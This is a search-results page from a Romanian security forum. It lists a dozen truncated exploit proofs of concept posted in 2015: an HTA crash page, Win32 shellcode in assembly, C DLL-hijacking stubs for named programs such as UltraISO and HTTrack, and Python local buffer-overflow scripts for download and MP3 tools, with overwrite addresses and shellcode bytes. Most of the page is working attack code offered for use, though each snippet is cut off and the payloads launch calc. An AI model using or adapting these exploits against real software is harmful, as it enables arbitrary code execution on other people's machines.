Jump to content

Search the Community

Showing results for tags '\#[+]'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 12 results

  1. /* #[+] Author: Mohammad Reza Espargham #[+] Title: MS Windows HTA (HTML Aplication) - Crash PoC #[+] Date: 19-05-2015 #[+] Tested on: Win7 dash> save below code as Crash.hta file and Double Click on it Crash... */ <html> <title>Mohammad Reza Espargham</title> </br> <body onload="javascript:ReZa();"></body> <script> function ReZa() { var buffer = '\x43'; var buffer1 = '\x42'; var buffer2 = '\x41'; for (i =0;i<956;i++) { buffer+=buffer+'\x42'; document.write('<>'+buffer+buffer1+buffer2); }} </script> </html> Source @alinpetre
  2. /* #[+] Author: TUNISIAN CYBER #[+] Title: Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes) #[+] Date: 15-04-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp 32bit SP3 #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Credits: steve hanna projectshellcode.com ============================= Assembly: ;create.asm [Section .text] BITS 32 global _start _start: jmp short GetCommand CommandReturn: pop ebx xor eax,eax push eax push ebx mov ebx,0x7c8623ad call ebx xor eax,eax push eax mov ebx, 0x7c81cafa call ebx G
  3. #[+] Author: TUNISIAN CYBER #[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/naHAdJF.png #[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source
  4. /* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: BZR Player 1.03 DLL Hijacking #[+] Date: 29-03-2015 #[+] Type: Local Exploits #[+] Vendor: http://bzrplayer.blazer.nu/ #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll tcyber.c # Copy it to the software dir. then execute the software , calc.exe will launch . #Vulnerable and Exploitable DLLs: output_dsound.dll codec_cdda.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_va
  5. #[+] Author: TUNISIAN CYBER #[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Vendor: https://httrack.com/page/2/fr/index.html #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source: htt
  6. /* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking #[+] Date: 29-03-2015 #[+] Type: Local Exploits #[+] Vendor: SmartKey ZIP Password Recovery – Recover ZIP, WinZip, PKZip Password #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o dwmapi.dll tcyber.c # Copy it to the software dir. then execute the software , calc.exe will launch . Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI Dll
  7. #[+] Author: TUNISIAN CYBER #[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Vendor: https://httrack.com/page/2/fr/index.html #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source
  8. #!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: IDM v6.20 Local Buffer Overflow #[+] Date: 27-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: https://www.internetdownloadmanager.com/ #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/7et4xSh.png #[+] Create IDMLBOF.txt then open , copy the content then go to Options-VPN/Dial Up and paste it in the username field. from struct import pack file="IDMLBOF.txt" junk="\x41"*2313 eip = pack('<I',0x7C9D30D7) nops = "\x90" * 3 shellcode = ("\xdb\xc0\x31\xc9\xbf
  9. #!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # http://www.exploit-db.com/exploits/8628/ #POC: #IMG1: #http://i.imgur.com/87sXIj8.png from struct import pack fi
  10. #!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Original POC: # http://www.exploit-db.com/exploits/11197/ #POC: #IMG1: #http://i.imgur.com/ifXYgwx.png #IMG2: #http://i.imgur.com/ZMisj6R.png from struct i
  11. #!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream RM-MP3 Converter v2.7.3.700 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow #POC: #IMG1: #http://i.imgur.com/ESt0
  12. #!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow #[+] Date: 20-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R from struct import pack file="evilfile.wav" junk="\x41"*4112 eip = pack('<I',0x7C9D30D7) nops = "\x90" * 3 #Calc.exe Shellcode #POC:http://youtu.be/_uvHKonqO2g shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31
×
×
  • Create New...